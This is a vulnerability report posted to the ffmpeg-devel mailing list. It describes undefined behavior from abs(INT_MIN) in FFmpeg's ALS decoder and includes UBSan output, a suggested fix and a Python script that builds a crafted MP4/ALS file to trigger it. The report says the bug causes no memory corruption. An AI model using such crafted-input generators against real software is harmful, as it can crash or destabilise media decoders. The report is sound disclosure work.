Hi, I found a UBSan-confirmed undefined behavior in libavcodec/alsdec.c.
FFmpeg version: N-123228-g0ddece40c5
Build: gcc 11 (Ubuntu 11.4.0-1ubuntu1~22.04.3), -fsanitize=address,undefined
Location: alsdec.c:1563
nbits[i] = 23 - av_log2(abs(ctx->raw_samples[c][i]));
When raw_samples[c][i] == INT_MIN (0x80000000), abs() invokes undefined
behavior -- negation of INT_MIN cannot be represented in signed int.
UBSan output:
libavcodec/alsdec.c:1563:41: runtime error: negation of
-2147483648 cannot be
represented in type 'int'; cast to an unsigned type to negate this
value to itself
#0 in read_diff_float_data libavcodec/alsdec.c:1563
#1 in read_frame_data libavcodec/alsdec.c:1793
#2 in decode_frame libavcodec/alsdec.c:1836
#3 in decode_simple_internal libavcodec/decode.c:444
Trigger conditions:
- ALS stream with floating=1 in ALSSpecificConfig
- acf != FLOAT_1 (takes the av_cmp_sf_ieee754 branch at L1562)
- Rice-coded sample value that produces raw_samples[c][i] == INT_MIN
(e.g. shift_lsbs=16, decoded value=32768 -> 32768 << 16 = 0x80000000)
Reproduction (UBSan+ASan build required):
python3 poc_als.py # generates /tmp/poc_als
ffmpeg -i /tmp/poc_als -f null - 2>&1
Note: no memory corruption results. The FFMIN() at L1567 uses an unsigned
comparison (highest_byte is unsigned int), so the indeterminate nbits[i]
value gets clamped before any memory access or nchars accumulation.
Suggested fix:
nbits[i] = 23 - av_log2(FFABS(ctx->raw_samples[c][i]));
FFABS() handles INT_MIN correctly by casting to unsigned before negation.
PoC generator (poc_als.py) and full UBSan log (crash.log) attached.
Thanks,
Jenny Guanni Qu
[email protected]
crash.log
Description: Binary data
#!/usr/bin/env python3
"""
PoC for UBSan-confirmed undefined behavior in alsdec.c read_diff_float_data()
Bug: nbits[i] = 23 - av_log2(abs(raw_samples[i])). When raw_samples[i] == INT_MIN
(0x80000000), abs(INT_MIN) invokes undefined behavior -- negation of INT_MIN cannot
be represented in type 'int'. UBSan reports:
runtime error: negation of -2147483648 cannot be represented in type 'int'
Note: No heap overflow results. The FFMIN() at L1567 uses an unsigned comparison
(highest_byte is unsigned int), so the indeterminate nbits[i] value is clamped
before any memory access or nchars accumulation.
Trigger: ALS stream with floating=1, acf!=FLOAT_1, raw_samples == INT_MIN (achieved
via shift_lsbs=16), highest_byte != 0.
"""
import struct
import sys
import io
def write_be32(val):
return struct.pack('>I', val & 0xFFFFFFFF)
def write_be16(val):
return struct.pack('>H', val & 0xFFFF)
def write_be24(val):
return struct.pack('>I', val & 0xFFFFFF)[1:]
class BitWriter:
def __init__(self):
self.bits = []
def write_bits(self, value, nbits):
for i in range(nbits - 1, -1, -1):
self.bits.append((value >> i) & 1)
def write_bit(self, value):
self.bits.append(value & 1)
def to_bytes(self):
# Pad to byte boundary
while len(self.bits) % 8 != 0:
self.bits.append(0)
result = bytearray()
for i in range(0, len(self.bits), 8):
byte = 0
for j in range(8):
byte = (byte << 1) | self.bits[i + j]
result.append(byte)
return bytes(result)
def __len__(self):
return len(self.bits)
def rice_encode(value, k):
"""Encode a signed value using Rice coding as per alsdec.c decode_rice().
decode_rice: q = unary(0), r = get_bits1(gb)
if k > 1: q <<= (k-1), q += get_bits(gb, k-1)
if k == 1: (same as k>1 but k-1=0)
if k == 0: special
return r ? q : ~q
"""
bits = []
if value >= 0:
r = 1
q = value
else:
r = 0
q = ~value # ~value for negative
if k > 1:
q_high = q >> (k - 1)
q_low = q & ((1 << (k - 1)) - 1)
elif k == 1:
q_high = q
q_low = None # no extra bits
else:
# k == 0: q = unary >> 1, r = !(q_orig & 1)
# For simplicity, handle differently
if value >= 0:
q_orig = value * 2
else:
q_orig = (-value) * 2 - 1
# Unary encode q_orig (1-bits then 0-bit)
for _ in range(q_orig):
bits.append(1)
bits.append(0)
return bits
# Unary encode q_high (q_high ones followed by a 0)
# get_unary(gb, 0, max) counts 1-bits until a 0-bit
for _ in range(q_high):
bits.append(1)
bits.append(0)
# r bit
bits.append(r)
# k-1 low bits (MSB first)
if k > 1:
for i in range(k - 2, -1, -1):
bits.append((q_low >> i) & 1)
return bits
def build_als_extradata(sample_rate, num_samples, num_channels, frame_length):
"""Build AudioSpecificConfig with ALS specific config as extradata."""
bw = BitWriter()
# AudioSpecificConfig
# audioObjectType = 36 (ALS) - needs 5 bits = 31 (escape) + 6 bits = 36-32=4
bw.write_bits(31, 5) # escape
bw.write_bits(4, 6) # 32 + 4 = 36
# samplingFrequencyIndex = 0xF (escape, then 24-bit freq)
bw.write_bits(0xF, 4)
bw.write_bits(sample_rate, 24)
# channelConfiguration = 1 (mono)
bw.write_bits(1, 4)
# For ALS (AOT 36), the parser does:
# skip_bits(gb, 5) -- 5 bits padding/fillBits
# Then checks for ALS\0 marker
bw.write_bits(0, 5) # 5 fill bits
# ALSSpecificConfig starts here
# ALS identifier: 'ALS\0'
bw.write_bits(0x414C5300, 32)
# samp_freq (32 bits)
bw.write_bits(sample_rate, 32)
# samples (32 bits)
bw.write_bits(num_samples, 32)
# channels - 1 (16 bits)
bw.write_bits(num_channels - 1, 16)
# file_type (3 bits) = 0 (raw)
bw.write_bits(0, 3)
# resolution (3 bits) = 3 (32-bit)
bw.write_bits(3, 3)
# floating (1 bit) = 1
bw.write_bit(1)
# msb_first (1 bit) = 0
bw.write_bit(0)
# frame_length - 1 (16 bits)
bw.write_bits(frame_length - 1, 16)
# ra_distance (8 bits) = 1 (every frame is RA)
bw.write_bits(1, 8)
# ra_flag (2 bits) = 0 (RA_FLAG_NONE - no ra unit sizes)
bw.write_bits(0, 2)
# adapt_order (1 bit) = 0
bw.write_bit(0)
# coef_table (2 bits) = 0
bw.write_bits(0, 2)
# long_term_prediction (1 bit) = 0
bw.write_bit(0)
# max_order (10 bits) = 0
bw.write_bits(0, 10)
# block_switching (2 bits) = 0
bw.write_bits(0, 2)
# bgmc (1 bit) = 0
bw.write_bit(0)
# sb_part (1 bit) = 0
bw.write_bit(0)
# joint_stereo (1 bit) = 0
bw.write_bit(0)
# mc_coding (1 bit) = 0
bw.write_bit(0)
# chan_config (1 bit) = 0
bw.write_bit(0)
# chan_sort (1 bit) = 0
bw.write_bit(0)
# crc_enabled (1 bit) = 0
bw.write_bit(0)
# rlslms (1 bit) = 0
bw.write_bit(0)
# reserved (5 bits) = 0
bw.write_bits(0, 5)
# aux_data_enabled (1 bit) = 0
bw.write_bit(0)
# header_size (32 bits) = 0xFFFFFFFF (no header)
bw.write_bits(0xFFFFFFFF, 32)
# trailer_size (32 bits) = 0xFFFFFFFF (no trailer)
bw.write_bits(0xFFFFFFFF, 32)
return bw.to_bytes()
def build_als_frame(frame_length):
"""Build one ALS frame with crafted data to trigger the bug.
Strategy:
- Variable block with opt_order=0 (max_order=0, adapt_order=0)
- Rice parameter s[0] = 15 (fits in 5 bits)
- shift_lsbs = 16 (to shift samples left by 16)
- Rice-encode value 32768 (0x8000) for each sample
- After shift: (unsigned)32768 << 16 = 0x80000000 (INT_MIN)
- abs(INT_MIN) invokes UB: negation of INT_MIN cannot be represented in 'int'
- UBSan reports: runtime error: negation of -2147483648 cannot be represented
in type 'int'; cast to an unsigned type to negate this value to itself
- FFMIN at L1567 clamps nbits before any memory access (no heap overflow)
"""
bw = BitWriter()
# === Frame data (read_frame_data) ===
# mc_coding=0, joint_stereo=0 -> independent_bs=1
# block_switching=0 -> no bs_info bits read
# parse_bs_info(0,...) produces 1 block of frame_length
# For channel 0 (only channel, independent):
# read_block: first bit = 1 (variable block)
bw.write_bit(1)
# read_var_block_data:
# js_blocks (1 bit) = 0
bw.write_bit(0)
# bgmc=0, sb_part=0: no sub-block bits read
# s[0] = get_bits(gb, 5) [resolution=3 > 1, so 4+1=5 bits]
# Set s[0] = 15 (Rice parameter)
bw.write_bits(15, 5)
# shift_lsbs flag (1 bit) = 1
bw.write_bit(1)
# shift_lsbs value: get_bits(gb, 4) + 1 = 16, so write 15
bw.write_bits(15, 4)
# rlslms=0, adapt_order=0, max_order=0 -> opt_order = max_order = 0
# No PARCOR coefficient reading
# No LTP reading (ltp=0)
# RA block with opt_order=0: no initial samples
# Rice-encode frame_length residuals with k=15
# Value 32768: positive, r=1, q=32768
# k=15: q_high = 32768 >> 14 = 2, q_low = 32768 & 0x3FFF = 0
# Unary(2) = 001, r=1, q_low(14 bits) = 00000000000000
# Total per sample: 3 + 1 + 14 = 18 bits
for _ in range(frame_length):
rice_bits = rice_encode(32768, 15)
for b in rice_bits:
bw.write_bit(b)
# Align to byte boundary (for non-mc_coding, non-joint_stereo path,
# align_get_bits is called in read_block)
while len(bw) % 8 != 0:
bw.write_bit(0)
# === read_diff_float_data (floating=1) ===
# 32 bits: num_bytes_diff_float (skipped, any value)
bw.write_bits(0, 32)
# use_acf (1 bit) = 0 -> acf[c] != FLOAT_1, takes the vulnerable nbits branch at alsdec.c:1562
bw.write_bit(0)
# Per channel (1 channel):
# highest_byte (2 bits) = 3
bw.write_bits(3, 2)
# partA_flag (1 bit) = 0 (skip part A)
bw.write_bit(0)
# shift_amp (1 bit) = 0 (use last_shift_value = 0 from RA init)
bw.write_bit(0)
# Part B (highest_byte=3 != 0):
# nbits computed for each non-zero sample:
# raw_samples[i] = (unsigned)32768 << 16 = 0x80000000 (as int32 = INT_MIN)
# abs(INT_MIN) -> UB: negation of -2147483648 cannot be represented in 'int'
# av_log2 result is indeterminate; FFMIN at L1567 clamps before memory access
#
# compressed/uncompressed bit (1 bit) = 1 (compressed -> MLZ path)
bw.write_bit(1)
# Provide some bits for MLZ to attempt reading
for _ in range(256):
bw.write_bits(0, 8)
return bw.to_bytes()
def build_mp4(extradata, frame_data):
"""Build a minimal MP4 container with ALS audio."""
def box(box_type, data):
size = 8 + len(data)
return struct.pack('>I', size) + box_type + data
# ftyp box
ftyp = box(b'ftyp', b'M4A \x00\x00\x00\x00M4A mp42')
# Build esds (ES Descriptor)
# DecoderConfigDescriptor
dec_config_desc = bytes([
0x04, # DecoderConfigDescrTag
len(extradata) + 13, # length
0x40, # objectTypeIndication = Audio ISO/IEC 14496-3
0x15, # streamType = audio (5<<2 | 1)
0x00, 0x00, 0x00, # bufferSizeDB
0x00, 0x01, 0x00, 0x00, # maxBitrate
0x00, 0x01, 0x00, 0x00, # avgBitrate
0x05, # DecoderSpecificInfoTag
len(extradata),
]) + extradata
esds_data = bytes([
0x00, 0x00, 0x00, 0x00, # version + flags
0x03, # ES_DescrTag
len(dec_config_desc) + 3, # length
0x00, 0x01, # ES_ID
0x00, # stream priority
]) + dec_config_desc + bytes([
0x06, 0x01, 0x02, # SLConfigDescriptor
])
esds = box(b'esds', esds_data)
# mp4a sample entry
sample_rate = 44100
mp4a_data = bytes([
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # reserved
0x00, 0x01, # data_reference_index
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # reserved
0x00, 0x01, # channel_count = 1
0x00, 0x10, # sample_size = 16
0x00, 0x00, # compression_id
0x00, 0x00, # packet_size
]) + struct.pack('>HH', sample_rate, 0) + esds # sample_rate as 16.16 fixed point
mp4a = box(b'mp4a', mp4a_data)
# stsd
stsd = box(b'stsd', bytes([0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01]) + mp4a)
# stts (time-to-sample)
frame_length = 4 # must match
stts = box(b'stts', struct.pack('>II II', 0, 1, 1, frame_length))
# stsc (sample-to-chunk)
stsc = box(b'stsc', struct.pack('>II III', 0, 1, 1, 1, 1))
# stsz (sample size)
stsz = box(b'stsz', struct.pack('>III', 0, 0, 1) + struct.pack('>I', len(frame_data)))
# stco (chunk offset) - will be fixed up
stco = box(b'stco', struct.pack('>II', 0, 1) + struct.pack('>I', 0)) # offset TBD
stbl = box(b'stbl', stsd + stts + stsc + stsz + stco)
# smhd (sound media header)
smhd = box(b'smhd', bytes(8))
# dinf + dref
url_box = box(b'url ', bytes([0x00, 0x00, 0x00, 0x01])) # self-contained
dref = box(b'dref', struct.pack('>II', 0, 1) + url_box)
dinf = box(b'dinf', dref)
minf = box(b'minf', smhd + dinf + stbl)
# mdhd (media header)
mdhd = box(b'mdhd', struct.pack('>IIIIII', 0, 0, 0, 44100, frame_length, 0))
# hdlr (handler)
hdlr = box(b'hdlr', bytes(4) + b'\x00\x00\x00\x00soun' + bytes(12) + b'SoundHandler\x00')
mdia = box(b'mdia', mdhd + hdlr + minf)
# tkhd (track header)
tkhd = box(b'tkhd', struct.pack('>I', 0x03) + bytes(4*4) +
struct.pack('>I', 1) + bytes(4*2) +
struct.pack('>I', frame_length) +
bytes(8) +
struct.pack('>HH', 0, 0) +
struct.pack('>H', 0x0100) + bytes(2) +
bytes(36) +
struct.pack('>II', 0, 0))
trak = box(b'trak', tkhd + mdia)
# mvhd (movie header)
mvhd = box(b'mvhd', struct.pack('>IIIIII', 0, 0, 0, 44100, frame_length, 0) +
struct.pack('>I', 0x00010000) +
struct.pack('>H', 0x0100) +
bytes(10) +
bytes(36) +
bytes(24) +
struct.pack('>I', 2))
moov = box(b'moov', mvhd + trak)
# mdat
mdat = box(b'mdat', frame_data)
# Calculate actual stco offset
mdat_data_offset = len(ftyp) + len(moov) + 8
result = ftyp + moov + mdat
# Find stco in result and patch the offset
stco_needle = b'stco'
pos = result.find(stco_needle)
if pos >= 0:
offset_pos = pos + 4 + 4 + 4
result = bytearray(result)
struct.pack_into('>I', result, offset_pos, mdat_data_offset)
result = bytes(result)
return result
def main():
sample_rate = 44100
frame_length = 4
num_samples = frame_length
num_channels = 1
print(f"[*] Building ALS PoC")
print(f" Sample rate: {sample_rate}")
print(f" Frame length: {frame_length}")
print(f" Channels: {num_channels}")
print(f" floating=1, max_order=0, adapt_order=0")
print(f" Rice param s[0]=15, shift_lsbs=16")
print(f" Raw sample value: 32768 << 16 = 0x80000000 (INT_MIN)")
print(f" nbits = 23 - av_log2(abs(INT_MIN)) triggers UB at alsdec.c:1563")
print(f" abs(INT_MIN): negation of -2147483648 cannot be represented in 'int'")
print(f" FFMIN at L1567 clamps nbits before any memory access (no heap overflow)")
extradata = build_als_extradata(sample_rate, num_samples, num_channels, frame_length)
print(f"\n[*] Extradata size: {len(extradata)} bytes")
print(f" Hex: {extradata.hex()}")
frame_data = build_als_frame(frame_length)
print(f"[*] Frame data size: {len(frame_data)} bytes")
print(f" Hex: {frame_data.hex()}")
mp4_data = build_mp4(extradata, frame_data)
output_path = "/tmp/poc_als"
with open(output_path, 'wb') as f:
f.write(mp4_data)
print(f"\n[+] PoC written to {output_path} ({len(mp4_data)} bytes)")
print(f"\n[*] Test with (UBSan+ASan build required):")
print(f" python3 poc_als.py")
print(f" ~/ffmpeg/ffmpeg -i {output_path} -f null - 2>&1 | tail -50")
if __name__ == '__main__':
main()
_______________________________________________ ffmpeg-devel mailing list -- [email protected] To unsubscribe send an email to [email protected]
